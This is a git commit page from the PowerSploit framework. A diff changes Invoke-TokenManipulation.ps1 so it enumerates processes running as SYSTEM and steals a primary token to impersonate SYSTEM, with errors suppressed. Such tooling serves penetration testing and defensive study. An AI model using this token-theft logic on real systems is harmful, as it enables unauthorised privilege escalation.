diff options
| author | PowerShellMafia <PowerShellMafia@users.noreply.github.com> | 2015-12-15 12:23:12 -0800 |
|---|---|---|
| committer | PowerShellMafia <PowerShellMafia@users.noreply.github.com> | 2015-12-15 12:23:12 -0800 |
| commit | fef09e6cc1371cc51fa94c087299d00929f19d91 (patch) | |
| tree | 391f2ed33ba5961805f65608654850db04b3eff4 /Exfiltration | |
| parent | f70c63f9d53167299404db582bc0a8acc96a661b (diff) | |
| parent | e179b2e9327135040b28cfc9719a2ffa0320a1f0 (diff) | |
| download | PowerSploit-fef09e6cc1371cc51fa94c087299d00929f19d91.tar.gz PowerSploit-fef09e6cc1371cc51fa94c087299d00929f19d91.zip | |
Merge pull request #91 from FixTheExchange/patch-1
Update Invoke-TokenManipulation.ps1 to address Win 10 incompatibility
Diffstat (limited to 'Exfiltration')
| -rw-r--r-- | Exfiltration/Invoke-TokenManipulation.ps1 | 13 |
1 files changed, 9 insertions, 4 deletions
diff --git a/Exfiltration/Invoke-TokenManipulation.ps1 b/Exfiltration/Invoke-TokenManipulation.ps1 index 7bfce3b..90f9d47 100644 --- a/Exfiltration/Invoke-TokenManipulation.ps1 +++ b/Exfiltration/Invoke-TokenManipulation.ps1 @@ -49,8 +49,8 @@ Author: Joe Bialek, Twitter: @JosephBialek License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None -Version: 1.11 -(1.1 -> 1.11: PassThru of System.Diagnostics.Process object added by Rune Mariboe, https://www.linkedin.com/in/runemariboe) +Version: 1.12 +(1.11 -> 1.12: Simple logic added by Josh M. Bryant to find an unprotected process to grab a SYSTEM token from, rather than hardcoding to wininit, https://www.fixtheexchange.com/) .DESCRIPTION @@ -1685,8 +1685,13 @@ Blog on this script: http://clymb3r.wordpress.com/2013/11/03/powershell-and-toke $AllTokens = @() #First GetSystem. The script cannot enumerate all tokens unless it is system for some reason. Luckily it can impersonate a system token. - #Even if already running as system, later parts on the script depend on having a SYSTEM token with most privileges, so impersonate the wininit token. - $systemTokenInfo = Get-PrimaryToken -ProcessId (Get-Process wininit | where {$_.SessionId -eq 0}).Id + #Even if already running as system, later parts on the script depend on having a SYSTEM token with most privileges. + #We need to enumrate all processes running as SYSTEM and find one that we can use. + $SystemTokens = Get-Process -IncludeUserName | Where {$_.Username -eq "NT AUTHORITY\SYSTEM"} + ForEach ($SystemToken in $SystemTokens) + { + $SystemTokenInfo = Get-PrimaryToken -ProcessId $SystemToken.Id -WarningAction SilentlyContinue -ErrorAction SilentlyContinue + } if ($systemTokenInfo -eq $null -or (-not (Invoke-ImpersonateUser -hToken $systemTokenInfo.hProcToken))) { Write-Warning "Unable to impersonate SYSTEM, the script will not be able to enumerate all tokens" |